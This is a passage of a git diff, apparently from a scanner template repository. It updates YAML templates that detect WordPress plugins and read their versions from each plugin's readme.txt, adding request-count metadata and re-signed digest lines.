490a0046304402202cd99a595a0495dde2f207b86a232b939e47ae71d6fafb1fbaafc8da279683160220203a0aa9a1acca9419a04d3d1ee4909f46be2b36e73eaa0ca1a0feac9969174b:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 5fa12de48f..53b51b0849 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: + max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/woocommerce-pdf-invoices-packing-slips/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009f1698a29285e443f983e5ce7bc2b5e5ebe213789b5914a4c49e08c56f27e76e02202fd8734a14c70965c94a10f5a76985585dd5fcfe9eecd7f0fe9e8ebd04025443:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221009f1698a29285e443f983e5ce7bc2b5e5ebe213789b5914a4c49e08c56f27e76e02202fd8734a14c70965c94a10f5a76985585dd5fcfe9eecd7f0fe9e8ebd04025443:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 9ab4cd4e53..f77f080742 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: + max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/woocommerce-services/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206badc48455365452aed55606fb2d68a8a132c5693cf885e9da86b0130357127d02201c3b1515611527150b62289c838559b0876f52c7eb89b60d604287700d17e68f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402206badc48455365452aed55606fb2d68a8a132c5693cf885e9da86b0130357127d02201c3b1515611527150b62289c838559b0876f52c7eb89b60d604287700d17e68f:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index f0cb23837b..0dd9716df7 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: + max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/woocommerce/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100846ed1b517c01b51011283959695c043000dab090ecd525b8728387c0f47313f022007fe71d70a6788faa11b33f95f9c8f5995f360e1b8003d99c0b7ffd9c7daf2c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100846ed1b517c01b51011283959695c043000dab090ecd525b8728387c0f47313f022007fe71d70a6788faa11b33f95f9c8f5995f360e1b8003d99c0b7ffd9c7daf2c4:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 412fd9958a..6b150ac688 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: + max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wordfence/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022040d1da29b7f5496c3657510e32481a5dea9a4765301512672398e9d67e7e39060220104ba355c547e28b3d232454d0b177fb04d92cd8845ab0212e09953ff5256371:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022040d1da29b7f5496c3657510e32481a5dea9a4765301512672398e9d67e7e39060220104ba355c547e28b3d232454d0b177fb04d92cd8845ab0212e09953ff5256371:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 648fadaa9a..d6c1f338e4 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: + max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wordpress-importer/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201fc32e228d6965f1aba3151b6107eb54803b5e94bf0a87e960aaf9702de7d88d022100e726b7a5862d154abacaaa04c2755b5eb110dd8691702953b68dc894355e4039:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502201fc32e228d6965f1aba3151b6107eb54803b5e94bf0a87e960aaf9702de7d88d022100e726b7a5862d154abacaaa04c2755b5eb110dd8691702953b68dc894355e4039:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5986545831..023d6ed012 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: + max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wordpress-seo/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022011d3c976486d7493de281aac86a4627588ebd0cdfba4756456540be991c8f5aa02204fb65dc757de6652b5cdc36ab280d9cf61fb31836cd4f1f1d0564ba4c08d249f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022011d3c976486d7493de281aac86a4627588ebd0cdfba4756456540be991c8f5aa02204fb65dc757de6652b5cdc36ab280d9cf61fb31836cd4f1f1d0564ba4c08d249f:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 4565795de1..e3b42b84fe 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: + max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/worker/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207c5e5858b207890b0228d7a89f2a17f6ac1767d06e9585320a7af77192546050022100e0aaa667aac4193b9dd7654e583c9687ab2146af4d8c5c91db1bba9f3515474a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502207c5e5858b207890b0228d7a89f2a17f6ac1767d06e9585320a7af77192546050022100e0aaa667aac4193b9dd7654e583c9687ab2146af4d8c5c91db1bba9f3515474a:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 5a65dc8fbc..2c33615b35 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: + max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-fastest-cache/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202a83c6737f486b9ad1d9dc6335fe9456fb2fe3d1087f68fc7a6e4d5e04aca75c022100ebb8661f0afb174afee02ce9f6b9b723ef9b49008e05cba0c5ba08c847e918ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502202a83c6737f486b9ad1d9dc6335fe9456fb2fe3d1087f68fc7a6e4d5e04aca75c022100ebb8661f0afb174afee02ce9f6b9b723ef9b49008e05cba0c5ba08c847e918ea:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index d18ecc83dc..9d636b5dbc 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: + max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-file-manager/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100886be4dfa15df94e108ef44ebe09de9b28cd4449df2ea1fbb503fffe4bfffea702206470c1505407146f82b96436825182be0598f33b5178ae35a523b44c1f3e46a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100886be4dfa15df94e108ef44ebe09de9b28cd4449df2ea1fbb503fffe4bfffea702206470c1505407146f82b96436825182be0598f33b5178ae35a523b44c1f3e46a7:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 21013cd114..baeb8fd1e0 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: + max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-google-maps/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f08a3e186608179f3e83a74e92174a0adfd3872dde9411c7c46e1e6c7f9e56f9022074138f98e8d93e3ef97e09be477e056b7db8a3c5313a238c9a0965c2a944088a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100f08a3e186608179f3e83a74e92174a0adfd3872dde9411c7c46e1e6c7f9e56f9022074138f98e8d93e3ef97e09be477e056b7db8a3c5313a238c9a0965c2a944088a:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 5826884e8a..4dee18fdae 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: + max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-mail-smtp/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100acb80329b80b23635fab528eedb9059c6f5f3fa8b49c984f998a39fada66cf9f02207541fe14810ee22e1d17645834edeb2f58b663d9fa0aaa0736a000b9e0866e6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100acb80329b80b23635fab528eedb9059c6f5f3fa8b49c984f998a39fada66cf9f02207541fe14810ee22e1d17645834edeb2f58b663d9fa0aaa0736a000b9e0866e6c:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index bbd2b9963b..b8a6c3eef2 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: + max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-maintenance-mode/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022001f5c0351ea6d84bfe7e387548e611415b8fe9c3680a2db0f2038a100890be04022100aec80bfef48a9eeeba1349068fbb073fad57a176c4f43ce6059182d568aa3778:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022001f5c0351ea6d84bfe7e387548e611415b8fe9c3680a2db0f2038a100890be04022100aec80bfef48a9eeeba1349068fbb073fad57a176c4f43ce6059182d568aa3778:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index 9ad122c5db..4116764aa0 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: + max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-migrate-db/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008fac626f0cc4da1553486998fd2f566dafd5fbdabacd8bf0af030c0d7353df24022063b2af66e7e865bc5ddcba5fdedf20281e250f6fc2a5e2edb89ff14dfab1fe26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221008fac626f0cc4da1553486998fd2f566dafd5fbdabacd8bf0af030c0d7353df24022063b2af66e7e865bc5ddcba5fdedf20281e250f6fc2a5e2edb89ff14dfab1fe26:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 22ff614409..082c6daaec 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: + max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-multibyte-patch/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210088cf7773435eecca072893286f514bf34597632627cf40251cc068ce21a5a5dc022100a5eb5d2e8db6b0eed675e01dc75857e3541728c7674b2d769631b5402ff23fdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a0048304602210088cf7773435eecca072893286f514bf34597632627cf40251cc068ce21a5a5dc022100a5eb5d2e8db6b0eed675e01dc75857e3541728c7674b2d769631b5402ff23fdb:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index bf421795e4..2418baf2d2 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: + max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-optimize/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207f91bbc48ba3b7c1d740dfa82d4e1c9c7ed1eb86eab536d2c154cf374fceec53022100b29913e9da9d59c16af13cccb4f2107be0b167e6a6022c48de4c6bd8097fc347:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502207f91bbc48ba3b7c1d740dfa82d4e1c9c7ed1eb86eab536d2c154cf374fceec53022100b29913e9da9d59c16af13cccb4f2107be0b167e6a6022c48de4c6bd8097fc347:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index f522524a1b..594c7b846e 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: + max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-pagenavi/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202749bacd2ec7bdcf93fd1a3822aee25592895d862132688526a88134d408a04502202a1171f6299268d2869d8b495df2d13d6facf9c8541307a212ea40a07e187531:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402202749bacd2ec7bdcf93fd1a3822aee25592895d862132688526a88134d408a04502202a1171f6299268d2869d8b495df2d13d6facf9c8541307a212ea40a07e187531:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 08ce153cea..42fa3bfe85 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: + max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-reset/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c72fef6975b501197533c1f430e0920b1fd920e13154977b3c6cef61c32fd558022100aab61a7e3a97dcfd7f426bc62abedab63a95b0c81b9be920da0f3a51c011058d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100c72fef6975b501197533c1f430e0920b1fd920e13154977b3c6cef61c32fd558022100aab61a7e3a97dcfd7f426bc62abedab63a95b0c81b9be920da0f3a51c011058d:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 12e766451e..bfb876f65a 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-reviews-plugin-for-google/ metadata: + max-request: 1 plugin_namespace: wp-reviews-plugin-for-google wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-reviews-plugin-for-google/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bbba48fa96e082ae02d98b4f923d1426bafc9e29e94cfecf448e3166988d1846022069c391bdf899f85f0279ae717333d688024089c4ccd83abcd49e7e596ac55534:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100bbba48fa96e082ae02d98b4f923d1426bafc9e29e94cfecf448e3166988d1846022069c391bdf899f85f0279ae717333d688024089c4ccd83abcd49e7e596ac55534:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index ee78b10222..c7324621ea 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: + max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-rollback/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100abeef94dc28fd2b4a8fa7b9d56f3f1a3bfa5244dcd95f0c36f4ffb23b2acde85022100cd1cd5af9f7f356b7c179e74685cb9838acadc7d1546cb5c7f8b8313cba69c65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100abeef94dc28fd2b4a8fa7b9d56f3f1a3bfa5244dcd95f0c36f4ffb23b2acde85022100cd1cd5af9f7f356b7c179e74685cb9838acadc7d1546cb5c7f8b8313cba69c65:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index d8a3837b9d..bfdff7c7a0 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-seopress/ metadata: + max-request: 1 plugin_namespace: wp-seopress wpscan: https://wpscan.com/plugin/wp-seopress tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-seopress/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008052f37309b0f03997fc03bf251de67b5fe0fa90a26a877ab726ec99d5bfcaac022013bedbfd4c475efef3856c8e2431c3424e40f6ecbf921c2db0b1e66bd7da56bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221008052f37309b0f03997fc03bf251de67b5fe0fa90a26a877ab726ec99d5bfcaac022013bedbfd4c475efef3856c8e2431c3424e40f6ecbf921c2db0b1e66bd7da56bf:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 04b751c61a..780d18db4f 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: + max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-sitemap-page/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100965e7b85f621e000b4fbb04ad940d2410a9ddd489d6e9ab757ca4dfd50be1e88022100c7927d1da4287b940995e7a91d7624e226648ac6830e57b39741a81c7dbd17d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100965e7b85f621e000b4fbb04ad940d2410a9ddd489d6e9ab757ca4dfd50be1e88022100c7927d1da4287b940995e7a91d7624e226648ac6830e57b39741a81c7dbd17d9:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index f9ea72fc64..18cd309dae 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: + max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-smushit/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e44eba7056a884212d343f5a9da8190f187b5e3c11303c8d204bc142179de1c40221008f57f5bbfe923ffffe4fc6993c8c7cb54ab509506eeaa8b39d04a89e54d07904:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100e44eba7056a884212d343f5a9da8190f187b5e3c11303c8d204bc142179de1c40221008f57f5bbfe923ffffe4fc6993c8c7cb54ab509506eeaa8b39d04a89e54d07904:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 6c7f1b1893..acedc263bb 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: + max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-statistics/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fd14c6a6c036001cc26dd91fc225a03ba828cd48f13b7178e79bf87d3836bab7022040efeb39ac8b52af882d7e132ad6060cd7bfc02672bd0e93bea308c4e2bcd916:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100fd14c6a6c036001cc26dd91fc225a03ba828cd48f13b7178e79bf87d3836bab7022040efeb39ac8b52af882d7e132ad6060cd7bfc02672bd0e93bea308c4e2bcd916:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 941ddebf0b..07c05140fa 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: + max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-super-cache/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f54e47abb854e93ddac15182d301969d94f06638340fd743168e5517daf2eaf402207fe2e5f9b50ddd6cd5b9f147d3350d06fa86f77dd90096724be6fdd67d9e913d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100f54e47abb854e93ddac15182d301969d94f06638340fd743168e5517daf2eaf402207fe2e5f9b50ddd6cd5b9f147d3350d06fa86f77dd90096724be6fdd67d9e913d:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index 2f7a23cf91..30709f149b 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: + max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - 